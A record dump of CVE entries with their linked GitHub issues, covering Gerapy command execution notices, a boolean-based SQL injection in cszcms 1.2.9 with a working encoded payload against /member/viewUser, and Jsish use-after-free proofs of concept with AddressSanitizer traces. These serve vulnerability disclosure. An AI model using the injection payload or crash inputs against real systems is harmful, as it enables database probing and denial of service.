"https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gerapy:gerapy:*:*:*:*:*:*:*:*", "matchCriteriaId": "FC824765-CEAB-47C3-A20C-B263A40ABFDE", "versionEndExcluding": "0.9.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "77" ]
77
https://github.com/Gerapy/Gerapy/issues/197
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Gerapy", "Gerapy" ]
Hello, The [GitHub Security Lab team](https://securitylab.github.com/) has found a potential vulnerability in your project. Please create a [Security Advisory](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/creating-a-security-advisory) and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a [Security Policy](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/adding-a-security-policy-to-your-repository) containing a security email address to send the details to. If you prefer to contact us by email, please reach out to securitylab@github.com with reference to `GHSL-2021-076-gerapy`. Thank you, Agustin Gianni GitHub Security Lab
GitHub Security Lab: Security Contact Needed
https://api.github.com/repos/Gerapy/Gerapy/issues/197/comments
1
2021-05-14T12:11:59Z
2021-12-26T11:17:19Z
https://github.com/Gerapy/Gerapy/issues/197
891,871,512
197
3,115
CVE-2021-32849
2022-01-26T22:15:07.903
Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/197" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/217" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://lgtm.com/projects/g/Gerapy/Gerapy?mode=tree&ruleFocus=1505994646253" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/197" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/issues/217" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://lgtm.com/projects/g/Gerapy/Gerapy?mode=tree&ruleFocus=1505994646253" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gerapy:gerapy:*:*:*:*:*:*:*:*", "matchCriteriaId": "FC824765-CEAB-47C3-A20C-B263A40ABFDE", "versionEndExcluding": "0.9.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "77" ]
77
https://github.com/Gerapy/Gerapy/issues/217
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Gerapy", "Gerapy" ]
The GitHub Security Lab reported a potential security vulnerability (GHSL-2021-076-gerapy) in your project on 2021/05/13. It has been 90 days since our initial report and as per our coordinated disclosure policy, we intend to publish a public advisory detailing this issue. If you do wish to further coordinate a response to this issue with the GitHub Security Lab, please contact us at securitylab@github.com within the next 7 days in reference to GHSL-2021-076-gerapy and we would love to help you resolve these issues. If not, feel free to close this issue after which we will proceed with advisory publication.
Security Issue: GHSL-2021-076-gerapy
https://api.github.com/repos/Gerapy/Gerapy/issues/217/comments
2
2021-11-22T09:05:04Z
2022-01-09T21:14:47Z
https://github.com/Gerapy/Gerapy/issues/217
1,059,877,092
217
3,116
CVE-2021-46377
2022-01-27T18:15:07.813
There is a front-end sql injection vulnerability in cszcms 1.2.9 via cszcms/controllers/Member.php#viewUser
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cskaza:cszcms:1.2.9:*:*:*:*:*:*:*", "matchCriteriaId": "A08F592A-91EF-4922-994E-A44A05BBA747", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/cskaza/cszcms/issues/33
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cskaza", "cszcms" ]
Hi, I found a front-end sql injection vulnerability in cszcms-1.2.9 The vulnerable code is on `cszcms\controllers\Member.php#viewUser` The `$this->uri->segment(3)` parameter here can be controlled by the user ![image](https://user-images.githubusercontent.com/65856396/149486766-4872a527-7387-451b-86f2-6113fb41a3cd.png) And no filtering leads to sql injection vulnerability ![image](https://user-images.githubusercontent.com/65856396/149486935-78ea5a49-7874-4b98-a1a6-de826c36388e.png) First register a user in the foreground, then log in, then visit `/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3e%31%29%2c%31%2c%30%29%23` ``` %27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3e%31%29%2c%31%2c%30%29%23 => '||if((length(database())>1),1,0)# ``` The content returned by the webpage is: ![image](https://user-images.githubusercontent.com/65856396/149487143-245139fd-d289-4692-a28c-f287b7a6a93c.png) visit `/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3c%31%29%2c%31%2c%30%29%23` ``` %27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3c%31%29%2c%31%2c%30%29%23 => '||if((length(database())<1),1,0)# ``` The content returned by the webpage is: ![image](https://user-images.githubusercontent.com/65856396/149487361-40cd0407-8888-48f0-95b4-835e1f771ed7.png) It's a Boolean-based SQL injection Suggest: Add a filter function to this parameter
Bug Report: There is a front-end boolean-based sql injection vulnerability
https://api.github.com/repos/cskaza/cszcms/issues/33/comments
0
2022-01-14T09:13:29Z
2022-01-14T09:13:29Z
https://github.com/cskaza/cszcms/issues/33
1,103,315,429
33
3,117
CVE-2021-46484
2022-01-27T21:15:08.343
Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_IncrRefCount in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/73" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/73" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/73
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case1 ```javascript function JSEtest(assert) { (arr.concat([]), false, 'JSEtest'); } var arr = /x?y?z?/.exec("abcd"); arr[arr[arr['JSEtest'[arr[1000] = 3]] = 3] = 3](arr.every(JSEtest), false, 'JSEtest'); ``` ###### Test case2 ```javascript var list = [ 'aa', 'bb', 'cc', 'dd', 'hhh', 'mm', 'nn' ]; 'sort:' + list.sort(function (_str, position) { var s = 'sort:' + list.sort(function (str, position) { var s = 'shift:' + list.shift(); }) + list.shift(); }); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==114358==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007060 at pc 0x556541bb6a68 bp 0x7ffd4e8abbc0 sp 0x7ffd4e8abbb0 READ of size 4 at 0x603000007060 thread T0 #0 0x556541bb6a67 in Jsi_IncrRefCount src/jsiValue.c:34 #1 0x556541d0aab5 in Jsi_ObjNewArray src/jsiObj.c:480 #2 0x556541c75f14 in jsi_ArrayFindSubCmd src/jsiArray.c:573 #3 0x556541c75f14 in jsi_ArrayEveryCmd src/jsiArray.c:663 #4 0x556541c31818 in jsi_FuncCallSub src/jsiProto.c:244 #5 0x556541efb71a in jsiFunctionSubCall src/jsiEval.c:796 #6 0x556541efb71a in jsiEvalFunction src/jsiEval.c:837 #7 0x556541efb71a in jsiEvalCodeSub src/jsiEval.c:1264 #8 0x556541f0f15e in jsi_evalcode src/jsiEval.c:2204 #9 0x556541f13274 in jsi_evalStrFile src/jsiEval.c:2665 #10 0x556541c0266a in Jsi_Main src/jsiInterp.c:936 #11 0x55654240703a in jsi_main src/main.c:47 #12 0x7f7e9588dbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #13 0x556541b96969 in _start (/usr/local/bin/jsish+0xe8969) 0x603000007060 is located 0 bytes inside of 32-byte region [0x603000007060,0x603000007080) freed by thread T0 here: #0 0x7f7e964fc7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x556541bb76cf in Jsi_DecrRefCount src/jsiValue.c:52 previously allocated by thread T0 here: #0 0x7f7e964fcd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x556541c07aa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:34 in Jsi_IncrRefCount Shadow bytes around the buggy address: 0x0c067fff8db0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8dc0: fd fd fa fa 00 00 04 fa fa fa 00 00 04 fa fa fa 0x0c067fff8dd0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8de0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8df0: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa =>0x0c067fff8e00: fd fd fd fd fa fa 00 00 00 00 fa fa[fd]fd fd fd 0x0c067fff8e10: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8e20: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff8e30: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa 0x0c067fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ```
Heap-use-after-free src/jsiValue.c:34 in Jsi_IncrRefCount
https://api.github.com/repos/pcmacdon/jsish/issues/73/comments
1
2021-12-24T10:41:10Z
2021-12-28T03:39:04Z
https://github.com/pcmacdon/jsish/issues/73
1,088,307,699
73
3,118
CVE-2021-46489
2022-01-27T21:15:08.603
Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_DecrRefCount in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/74" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/74" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/74
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript function JSEtest() { Object.prototype = 1; } JSEtest(); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==44651==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000001c0 at pc 0x5556b3bd8724 bp 0x7ffdd9e16980 sp 0x7ffdd9e16970 READ of size 4 at 0x6030000001c0 thread T0 #0 0x5556b3bd8723 in Jsi_DecrRefCount src/jsiValue.c:41 #1 0x5556b3c1177b in jsiInterpDelete src/jsiInterp.c:1933 #2 0x5556b4428047 in jsi_main src/main.c:49 #3 0x7fd6540bcbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #4 0x5556b3bb7969 in _start (/usr/local/bin/jsish+0xe8969) 0x6030000001c0 is located 0 bytes inside of 32-byte region [0x6030000001c0,0x6030000001e0) freed by thread T0 here: #0 0x7fd654d2b7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x5556b3bd86cf in Jsi_DecrRefCount src/jsiValue.c:52 previously allocated by thread T0 here: #0 0x7fd654d2bd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x5556b3c28aa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:41 in Jsi_DecrRefCount Shadow bytes around the buggy address: 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff8000: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd 0x0c067fff8010: fd fd fa fa fd fd fd fa fa fa fd fd fd fd fa fa 0x0c067fff8020: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd =>0x0c067fff8030: fa fa fd fd fd fd fa fa[fd]fd fd fd fa fa fd fd 0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8050: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8060: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8070: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8080: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ```
Heap-use-after-free src/jsiValue.c:41 in Jsi_DecrRefCount
https://api.github.com/repos/pcmacdon/jsish/issues/74/comments
0
2021-12-24T10:41:50Z
2021-12-27T15:24:09Z
https://github.com/pcmacdon/jsish/issues/74
1,088,308,024
74
3,119
CVE-2021-46494
2022-01-27T21:15:08.777
Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ValueLookupBase in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/78" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/78" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/78
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var JSEtest = function() {}; Function.prototype = 12; var obj = JSEtest.bind({}); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ================================================================= ==50188==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000000228 at pc 0x55ccf1df02ee bp 0x7ffcb1d1b0a0 sp 0x7ffcb1d1b090 READ of size 1 at 0x603000000228 thread T0 #0 0x55ccf1df02ed in jsi_ValueLookupBase src/jsiValue.c:980 #1 0x55ccf1df1175 in jsi_ValueLookupBase src/jsiValue.c:1007 #2 0x55ccf1df1175 in jsi_ValueSubscript src/jsiValue.c:1016 #3 0x55ccf211ad47 in jsiEvalSubscript src/jsiEval.c:997 #4 0x55ccf211ad47 in jsiEvalCodeSub src/jsiEval.c:1283 #5 0x55ccf213315e in jsi_evalcode src/jsiEval.c:2204 #6 0x55ccf2137274 in jsi_evalStrFile src/jsiEval.c:2665 #7 0x55ccf1e2666a in Jsi_Main src/jsiInterp.c:936 #8 0x55ccf262b03a in jsi_main src/main.c:47 #9 0x7fc99b738bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #10 0x55ccf1dba969 in _start (/usr/local/bin/jsish+0xe8969) 0x603000000228 is located 8 bytes inside of 32-byte region [0x603000000220,0x603000000240) freed by thread T0 here: #0 0x7fc99c3a77a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x55ccf1ddb6cf in Jsi_DecrRefCount src/jsiValue.c:52 previously allocated by thread T0 here: #0 0x7fc99c3a7d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55ccf1e2baa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:980 in jsi_ValueLookupBase Shadow bytes around the buggy address: 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff8000: fa fa 00 00 00 00 fa fa 00 00 07 fa fa fa 00 00 0x0c067fff8010: 00 00 fa fa 00 00 03 fa fa fa 00 00 00 00 fa fa 0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 =>0x0c067fff8040: 00 00 fa fa fd[fd]fd fd fa fa 00 00 00 00 fa fa 0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8060: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8070: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff8080: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8090: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==50188==ABORTING ``` Credits: Found by OWL337 team.
Heap-use-after-free src/jsiValue.c:980 in jsi_ValueLookupBase
https://api.github.com/repos/pcmacdon/jsish/issues/78/comments
0
2021-12-24T10:45:48Z
2022-01-12T02:16:10Z
https://github.com/pcmacdon/jsish/issues/78
1,088,309,877
78
3,120
CVE-2021-46495
2022-01-27T21:15:08.827
Jsish v3.5.0 was discovered to contain a heap-use-after-free via DeleteTreeValue in src/jsiObj.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": 